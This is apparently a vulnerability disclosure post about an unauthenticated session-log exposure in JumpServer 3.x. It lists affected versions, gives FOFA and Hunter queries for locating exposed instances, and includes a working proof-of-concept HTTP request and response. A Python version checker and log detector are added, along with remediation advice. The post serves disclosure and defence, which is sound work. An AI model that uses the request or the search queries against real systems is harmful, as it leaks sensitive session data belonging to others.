Preface
There is a flaw in JumpServer's permission management that allows an unauthorized remote attacker to download all operation logs during historical session connections, which can lead to the leakage of sensitive information.
Statement
Please do not use the techniques described in this article for illegal testing. Any direct or indirect consequences and losses caused by the dissemination and use of the information or tools provided in this article are the responsibility of the user alone and are unrelated to the author of the article. This article is for educational purposes only.
1. Introduction to JumpServer
JumpServer is an open source bastion host and permission management system used to manage and control remote server access permissions. It provides a secure way to manage and monitor access to target servers through JumpServer.
2. Vulnerability description
JumpServer is an open source bastion host and permission management system designed to help enterprises achieve secure management and access control of servers and network devices. A flaw in JumpServer's permission management allows an unauthenticated remote attacker to download all operation logs recorded during historical session connections. After analysis, the vulnerability is easy to exploit (a single unauthenticated API request is enough) and can lead to the leakage of sensitive information such as commands and output captured in those sessions.
3. Scope of influence
- 3.0.0 <= version <= 3.5.4
- 3.6.0 <= version <= 3.6.3
4. Asset search
Hunter syntax: app.name="JumpServer"
FOFA syntax: app="JumpServer-堡垒机"
5. Vulnerability reproduction
Vulnerability PoC
Request (note that no valid login is required; the jms_sessionid cookie below is not an authenticated session)
GET /api/v1/terminal/sessions/ HTTP/1.1
Host: XX.XX.XX.XX
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,ak;q=0.8
Cookie: XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX; jms_sessionid=tl4l16mf5x23mg0g2ku5npf2q2apru18
Connection: close
Response (HTTP 200 with the full session list, 759031 bytes in this case, returned to the unauthenticated caller)
HTTP/1.1 200 OK
Server: nginx
Date: Wed, 20 Sep 2023 02:09:54 GMT
Content-Type: application/json
Content-Length: 759031
Connection: close
Vary: Accept, Accept-Language, Cookie
Allow: GET, POST, PUT, PATCH, DELETE, HEAD, OPTIONS
X-Frame-Options: DENY
Content-Language: zh-hans
X-Content-Type-Options: nosniff
Referrer-Policy: same-origin
Set-Cookie: jms_sessionid=tl4l16mf5x23mg0g2ku5npf2q2apru18; HttpOnly; Path=/; SameSite=Lax
[{"id":"xxxx","user":"xxx",.....}]
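As an added example (not part of the original write-up or of the JumpServer project), the following Python triages a JumpServer version string against the affected ranges listed above and flags successful direct reads of the session-list endpoint in access logs. The nginx combined log format, the Referer-based heuristic, the host name and the sample log lines are all assumptions constructed here.

```python
import re

# Affected ranges from the advisory: 3.0.0 <= v <= 3.5.4 and 3.6.0 <= v <= 3.6.3.
AFFECTED_RANGES = [((3, 0, 0), (3, 5, 4)), ((3, 6, 0), (3, 6, 3))]
SENSITIVE_PREFIX = "/api/v1/terminal/sessions/"  # endpoint used in the PoC request above

def is_affected(version):
    """True if a version string such as '3.6.1' or 'v3.5.4' falls in an affected range."""
    parts = tuple(int(p) for p in version.lstrip("v").split(".")[:3])
    return any(lo <= parts <= hi for lo, hi in AFFECTED_RANGES)

# Assumed nginx "combined" format: ip - user [time] "METHOD path proto" status size "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\d+|-) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)

def suspicious_hits(log_lines, own_host):
    """Return (ip, path, bytes) for 200 responses on the session API not driven by the web UI.

    Heuristic (assumption): the bastion's own web UI sends a Referer from own_host on its
    API calls, while a direct request like the PoC above carries no Referer at all.
    """
    hits = []
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # unparsable line: skip it rather than abort the whole sweep
        path = m["path"].split("?", 1)[0]
        if not path.startswith(SENSITIVE_PREFIX) or m["status"] != "200":
            continue
        if own_host in m["referer"]:
            continue
        size = int(m["size"]) if m["size"].isdigit() else 0
        hits.append((m["ip"], path, size))
    return hits

# Constructed sample lines: one UI-driven read, one direct read with no Referer, one unrelated request.
SAMPLE_LOG = [
    '10.0.0.5 - - [20/Sep/2023:02:09:10 +0000] "GET /api/v1/terminal/sessions/?limit=15 HTTP/1.1" 200 4210 "https://jms.example.internal/ui/" "Mozilla/5.0"',
    '203.0.113.7 - - [20/Sep/2023:02:09:54 +0000] "GET /api/v1/terminal/sessions/ HTTP/1.1" 200 759031 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [20/Sep/2023:02:10:01 +0000] "GET /api/v1/users/ HTTP/1.1" 401 52 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for ip, path, size in suspicious_hits(SAMPLE_LOG, "jms.example.internal"):
        print(f"review: {ip} read {path} ({size} bytes) without a web-UI Referer")
```

A hit is a lead for review, not proof of compromise: correlate it with the authentication logs for that source address before treating the session contents as exposed.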
6. Remediation
The official fix has been released; affected users are advised to obtain the security patch from the vendor and upgrade. The advisory is published at https://github.com/jumpserver/jumpserver/security/advisories/GHSA-633x-3f4f-v9rw